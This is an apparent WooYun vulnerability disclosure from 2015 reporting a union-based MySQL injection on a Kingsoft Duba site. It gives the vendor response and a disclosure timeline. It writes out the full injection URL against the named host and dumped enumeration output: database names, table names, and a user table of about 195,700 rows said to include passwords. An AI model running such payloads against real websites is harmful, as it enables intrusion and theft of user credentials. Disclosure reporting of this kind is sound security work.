当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-095026
漏洞标题:
金山毒霸某站点MySQL注射(支持union,19万用户带password)
相关厂商:
金山软件集团
漏洞作者:
lijiejie
提交时间:
2015-02-01 13:58
修复时间:
2015-03-18 14:00
公开时间:
2015-03-18 14:00
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
12
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-02-01: 细节已通知厂商并且等待厂商处理中
2015-02-01: 厂商已经确认,细节仅向厂商公开
2015-02-11: 细节向核心白帽子及相关领域专家公开
2015-02-21: 细节向普通白帽子公开
2015-03-03: 细节向实习白帽子公开
2015-03-18: 细节向公众公开

简要描述:

金山毒霸某站点MySQL注射(支持union,19万用户带password)

详细说明:

注射点:

http://www.duba.com/nav.php?c=gaoxiao_view&curid=72215&id=72215 and -1 union all select 1,2,3,4,5,6,7,user(),9,10,11,12,13%23

漏洞证明:

duba.com.mysqli.png


available databases [3]:
[*] duba_nav
[*] information_schema
[*] test


Database: duba_nav
[107 tables]
+------------------------------+
| 2012101_card                 |
| 2012101_jp                   |
| 2012101_xlogion              |
| kn_orderlog_20140326-bak     |
| b_admin_user                 |
| b_book_chapters              |
| b_book_chapters_oth          |
| b_book_d_chapters            |
| b_book_d_info                |
| b_book_d_queue               |
| b_book_d_site                |
| b_book_info                  |
| b_book_info_oth              |
| b_book_provider              |
| b_book_top                   |
| b_class                      |
| b_class_site                 |
| b_common_class               |
| b_common_class_info          |
| b_config                     |
| kn_admin_user                |
| kn_advert                    |
| kn_baodan_gift               |
| kn_block                     |
| kn_block_attr                |
| kn_book                      |
| kn_bookOrder                 |
| kn_book_bak                  |
| kn_chongzhi                  |
| kn_city_id_name              |
| kn_city_id_name_copy         |
| kn_city_id_name_new          |
| kn_cknum                     |
| kn_class                     |
| kn_class_bak_20131023        |
| kn_common_class              |
| kn_common_class_bak_20131023 |
| kn_common_class_bak_20131024 |
| kn_common_class_bak_20131025 |
| kn_config                    |
| kn_coolclass                 |
| kn_coolsite                  |
| kn_extends_tmp               |
| kn_feedback                  |
| kn_feedback_copy             |
| kn_fnj                       |
| kn_gx_rank                   |
| kn_index_tool                |
| kn_ipstates                  |
| kn_jokes_mobile              |
| kn_jsj                       |
| kn_keyword                   |
| kn_links                     |
| kn_meinv                     |
| kn_ming                      |
| kn_mingzhan                  |
| kn_mwt_goods_lhj             |
| kn_mwt_hd_lhj                |
| kn_oldclass                  |
| kn_oldsite                   |
| kn_orderlog                  |
| kn_pic_gaoxiao               |
| kn_pic_meinv                 |
| kn_pic_pet                   |
| kn_pic_shuaige               |
| kn_pic_travel                |
| kn_pic_wallpaper             |
| kn_recycler                  |
| kn_search                    |
| kn_search_keyword            |
| kn_searchclass               |
| kn_sex_news                  |
| kn_site                      |
| kn_site_bak_20131023         |
| kn_site_bak_20131024         |
| kn_site_bak_20131025         |
| kn_site_copy                 |
| kn_site_search               |
| kn_site_singer               |
| kn_sitedb                    |
| kn_tag                       |
| kn_tag_bak_20131025          |
| kn_tb1111                    |
| kn_tbcode                    |
| kn_tbuser                    |
| kn_user                      |
| kn_user_copy                 |
| kn_user_custom_class         |
| kn_user_custom_url           |
| kn_weatherinfo               |
| kn_xiaoguo_news              |
| kn_xiaohua                   |
| kn_xiaohua_new               |
| kn_youhui                    |
| kn_zhekou                    |
| kn_zhuanti                   |
| kn_zhuanticlass              |
| kn_zhuantisite               |
| kn_zk_code                   |
| kn_zt                        |
| kn_zt_gift                   |
| q_got_award_info             |
| q_library                    |
| q_record                     |
| q_user_answer_log            |
| q_userinfo                   |
| v5_tongji                    |
+------------------------------+


+---------+---------+
| Table   | Entries |
+---------+---------+
| kn_user | 195700  |
+---------+---------+

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-01 14:38

厂商回复:

收到,我们立刻处理,谢谢!

最新状态:

暂无